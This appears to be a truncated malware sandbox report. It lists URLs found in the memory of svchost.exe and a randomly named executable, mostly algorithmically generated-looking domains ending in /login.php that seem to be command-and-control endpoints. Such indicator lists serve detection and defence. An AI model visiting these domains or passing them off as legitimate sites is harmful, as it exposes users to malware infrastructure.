Source: svchost.exe, 00000002.00000003.2349886516.00000000092A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupyxal.com/H
Source: svchost.exe, 00000002.00000003.2649333466.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2657780583.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346961253.0000000003360000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupyxal.com/login.php
Source: svchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2344956997.0000000003378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2601374159.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2571444797.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2342419975.0000000003378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2612862437.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332264267.0000000003378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2344054756.0000000003378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purycul.com/login.php
Source: svchost.exe, 00000002.00000003.2397665900.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2414263063.00000000033CA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2197741050.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425745567.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2422762232.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388405607.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2178331950.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2185840806.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2185076169.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2622033644.0000000008E90000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2718258067.0000000008D72000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2744689381.0000000009396000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2613849314.0000000000F68000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2671362092.00000000086C1000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2608350004.0000000000802000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2671362092.0000000008682000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2745540362.00000000093CD000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000013.00000002.2640207678.0000000001363000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000013.00000002.2756051050.000000000914B000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000015.00000002.2856769526.0000000008FC3000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000015.00000002.2676238100.00000000010BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purydyv.com/login.php
Source: svchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329364841.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2327922219.00000000092C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2607855494.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2330522610.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2609571355.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purygeg.com/login.php
Source: svchost.exe, 00000002.00000003.2757808782.0000000003319000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purygiv.com/login.php
Source: svchost.exe, 00000002.00000003.2666875773.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2657780583.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2693258532.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puryjeq.com/login.php
Source: svchost.exe, 00000002.00000003.2513678339.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2310815345.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2322419492.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2311968303.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2542956129.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2310767470.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513019694.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499635923.0000000000855000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2314873415.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2322755404.00000000092B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puryjil.com/login.php
Source: svchost.exe, 00000002.00000002.3428370692.00000000092EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2919185604.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380581815.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380222392.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3287645590.00000000092EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2908725007.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2905696441.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3421967691.00000000040FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3426788667.0000000009235000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purylal.com/login.php
Source: svchost.exe, 00000002.00000003.2649333466.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347333934.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347614295.0000000000853000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purylup.com/login.php
Source: svchost.exe, 00000002.00000003.2359792353.000000000924A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2360483972.000000000924A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purymog.com/http://qegylul.com/http://lyryman.com/P
Source: svchost.exe, 00000002.00000003.2726510414.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2360502034.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760150538.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2746470521.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358968663.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358089375.00000000092C8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2359102012.00000000092C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purymog.com/login.php
Source: svchost.exe, 00000002.00000003.2376137841.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2879404289.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2884058737.00000000092E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purypig.com/login.php
Source: svchost.exe, 00000002.00000003.2346403174.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346603921.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649350353.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346961253.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356885542.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346691543.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356000937.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349309789.00000000092C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purytov.com/login.php
Source: svchost.exe, 00000002.00000003.2289346650.00000000008E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296615273.000000000337B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2496966130.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2289345179.00000000092B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purytyg.com/login.php
Source: svchost.exe, 00000002.00000003.2666875773.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667617957.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2693258532.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purywyl.com/login.php
Source: svchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2657780583.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2693258532.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2672508299.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvybuv.com/login.php
Source: svchost.exe, 00000002.00000003.2726510414.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2360502034.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760150538.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2361214474.0000000003356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2746470521.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2363843323.0000000003378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358968663.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358089375.00000000092C8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2360803451.0000000003378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2359102012.00000000092C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvydyp.com/login.php
Source: svchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667617957.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2693258532.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2653309169.00000000033EE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvygog.com/login.php
Source: svchost.exe, 00000002.00000003.2397665900.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3419128942.000000000336B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427392798.0000000009288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2925665962.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425745567.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2927397659.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2381728153.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388806823.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2928746848.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3279511546.0000000003369000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2422762232.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2928459922.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427876534.00000000092B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvygyv.com/login.php
Source: svchost.exe, 00000002.00000002.3428370692.00000000092EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2919185604.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2379463124.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380581815.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380222392.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3287645590.00000000092EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2905696441.00000000092E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvyjiq.com/login.php
Source: svchost.exe, 00000002.00000003.2289346650.00000000008E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2287542216.0000000003330000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2496966130.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2289345179.00000000092B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvyjop.com/login.php
Source: svchost.exe, 00000002.00000003.2649333466.00000000092E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvyjyl.com/H
Source: svchost.exe, 00000002.00000003.2346403174.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346603921.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649747897.00000000040F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667617957.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649350353.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2647496494.00000000040F3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356885542.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346691543.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356000937.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349309789.00000000092C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvyjyl.com/login.php
Source: svchost.exe, 00000002.00000003.2885524752.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2879404289.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2377025491.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380581815.00000000092C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2896263867.0000000000854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvylep.com/login.php
Source: svchost.exe, 00000002.00000003.2649333466.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2647508543.000000000332F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347333934.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2642575826.000000000332F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347614295.0000000000853000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvymaq.com/login.php
Source: svchost.exe, 00000002.00000003.2329963433.0000000003319000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328865580.0000000003315000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329926664.0000000003317000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2330471483.00000000092D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvypul.com/
Source: svchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329364841.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329971226.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2330522610.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547959760.00000000092E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvypul.com/login.php
Source: svchost.exe, 00000002.00000003.2397665900.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388023341.0000000000852000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425745567.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2422762232.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2178331950.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2178415911.00000000033F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2386784820.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2385120826.00000000033EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2185076169.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398171627.0000000000854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2387081098.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2604863482.00000000010A3000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2622033644.0000000008E90000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000003.2572564754.0000000000FB2000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2718258067.0000000008D47000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2718258067.0000000008D8F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2744689381.0000000009396000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000003.2558068199.0000000008D9F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2671362092.00000000086C1000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2608350004.00000000007DF000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2614917822.00000000014D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvytuq.com/login.php
Source: svchost.exe, 00000002.00000002.3428370692.00000000092EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2919185604.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3287645590.00000000092EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3408110880.0000000000855000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3421967691.00000000040FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzybeq.com/login.php
Source: svchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2672508299.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzybil.com/login.php
Source: svchost.exe, 00000002.00000003.2509683984.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2322419492.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2311968303.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2527939785.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2523187509.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2310767470.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2512099666.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2506997946.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2314873415.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2322755404.00000000092B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzydal.com/login.php
Source: svchost.exe, 00000002.00000003.2397665900.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425745567.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2381728153.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3408110880.0000000000855000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2422762232.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3421967691.00000000040FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzydog.com/login.php
Source: svchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2693258532.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356885542.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356000937.00000000092BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzyduq.com/login.php
Source: svchost.exe, 00000002.00000003.2346403174.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649333466.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346603921.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2657780583.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649747897.00000000040F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349255775.0000000003379000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2647496494.00000000040F3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346961253.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346691543.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349309789.00000000092C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzygop.com/login.php
Source: svchost.exe, 00000002.00000003.2346403174.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346603921.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2342419975.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635305989.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346961253.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346691543.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349309789.00000000092C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzyjyg.com/login.php
Source: svchost.exe, 00000002.00000003.2397665900.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2178063171.000000000923F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2197741050.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2185076169.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388042380.00000000092C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2399948508.0000000009324000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2387081098.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2604863482.0000000001098000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2622033644.0000000008E90000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2718258067.0000000008D8F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000003.2558068199.0000000008D9F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2671362092.00000000086C1000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2608350004.0000000000802000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 